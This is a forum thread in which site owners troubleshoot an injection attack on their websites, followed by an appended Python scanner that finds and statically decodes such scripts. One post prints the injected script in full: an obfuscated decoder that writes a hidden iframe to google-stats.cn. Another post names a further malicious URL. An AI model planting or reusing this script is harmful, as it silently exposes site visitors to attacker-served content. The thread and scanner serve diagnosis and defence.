Website accessing unknown URL

manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Website accessing unknown URL

Post by manis »

My website (PHP/MySQL) is fetching data from unknown URLs, for example google-stats.cn, googlezet.net and a few more. I did a find through the entire website folder but could not find these URLs. This seems to be very difficult to solve?
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Website accessing unknown URL

Post by Mordred »

URL?
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

Thanks for your reply. At this time I am not able to reveal the URL due to a confidentiality agreement with my customer. If you can relate to the problem and give me information to identify and resolve the issue, it will be of great help.

This is the only site in the search where I could find some info.
http://webhelper4u.net/whmembers/sitesl ... alphaA.txt


Thank you again for your reply, I look forward to your advice.
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

This is what the code has created in an index file, but these variables are dynamic and get generated in almost any file.

<!-- o --><script type="text/javascript">function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2){xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}document.write(xlwqrzxo);}jgouxhcixerkio("3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru747470wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3Fwqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxeru72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru65wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru3022206865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxeru62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxeru69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script><!-- c -->
pobise
Forum Newbie
Posts: 1
Joined: Wed Oct 08, 2008 6:50 am
Location: Sweden

Re: Website accessing unknown URL

Post by pobise »

I have experienced the same thing!
On one of my clients' FTP accounts, in an index.html file, the function "function jgouxhcixerkio" was inserted
and the jpg image loaded on that page was edited with a URL to
"[http://srq3h.com/center/movies/images/luk/index.php]" which I suppose will load even more crap if you go there...

When I searched the site I found additional pages that had the
"function jgouxhcixerkio" or similar, such as function pkjrwddej(nhehhbxp) etc.

I have asked the web hotel to change the password to the FTP account,
made the index and jpg file not editable (write protected),
scanned my computer for viruses etc. and cleaned it! --> several cookies deleted.

Now I hope this will solve the problem if any 'gangster' got hold of the ftp_account login.

Anyone else experienced this?
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

What we have done as an immediate fix is change all the common file names, e.g. index, config, login, etc. This has solved the issue, but I am not sure if this has also infected other files.
I will also change the FTP access password. How can these kinds of attacks be prevented in the future? Do you know any software which can scan the website (offline) for exploits?

Thanks Again! Great Help!

Manis
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Website accessing unknown URL

Post by Mordred »

This sounds like a "local" problem - it happens that your machine (that is used to FTP to the site) has some malware on it, which has sniffed the FTP password and injected the code. Reupload your site from a clean machine and see if it helps.
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

This might be true. I have cleaned the system and uploaded the code again. I am waiting to see any changes.

Is there any tool/software which can manage security? Whatsoever the infection, will it clean the code locally?

Thanks!
Manis
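
The injected script posted above stores its markup as hex mixed with a filler token, so the domain never appears as plain text in the files, which is why a text search of the site folder finds nothing. As an added example (not code from any poster in this thread), the Python below scans a local copy of a site for that decoder pattern, which also matches renamed variants like the one pobise mentions, and decodes the argument statically without running it. The sample input is constructed, and the function names, extension list and filler `zqxk` are assumptions of this example.

```python
import os
import re

# The decoder loop stays the same even when function/variable names are randomised.
DECODER_RE = re.compile(
    r"String\.fromCharCode\(\s*parseInt\(\s*\w+\.substr\(\s*\w+\s*,\s*2\s*\)\s*,\s*16\s*\)")
# Call site: name("<hex mixed with filler>".replace(/<filler>/g, ""))
CALL_RE = re.compile(
    r'\b\w+\(\s*"([0-9A-Za-z]+)"\s*\.replace\(\s*/(\w+)/g\s*,\s*""\s*\)\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
WEB_EXT = (".php", ".html", ".htm", ".js", ".inc", ".tpl")  # assumed list

def decode_payload(blob, filler):
    """Undo the obfuscation statically: drop the filler token, then hex-decode."""
    hex_text = blob.replace(filler, "")
    if len(hex_text) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", hex_text):
        return None  # not this encoding; leave the file for manual review
    return bytes.fromhex(hex_text).decode("latin-1")

def scan_text(text):
    """Return one finding per injected call: decoded markup and the URLs in it."""
    if not DECODER_RE.search(text):
        return []
    findings = []
    for m in CALL_RE.finditer(text):
        decoded = decode_payload(m.group(1), m.group(2))
        if decoded is not None:
            findings.append({"decoded": decoded, "urls": URL_RE.findall(decoded)})
    return findings

def scan_tree(root):
    """Walk a local copy of the site and map file path -> findings."""
    hits = {}
    for folder, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(WEB_EXT):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample (not the thread's payload): iframe to reserved example.invalid.
SAMPLE = (
    '<!-- o --><script type="text/javascript">function abcd(s){var o="";'
    'for(i=0;i<s.length;i+=2){o+=(String.fromCharCode(parseInt(s.substr(i,2),16)));}'
    'document.write(o);}abcd("3C6966zqxk72616Dzqxk6520737263zqxk3D22687474703A2F2F'
    'zqxk6578616D706C652Ezqxk696E76616C69642F223Ezqxk".replace(/zqxk/g, ""));</script><!-- c -->\n')
```

`scan_tree("/path/to/site-copy")` returns a mapping of file path to decoded findings; the path is a placeholder for wherever the downloaded copy lives.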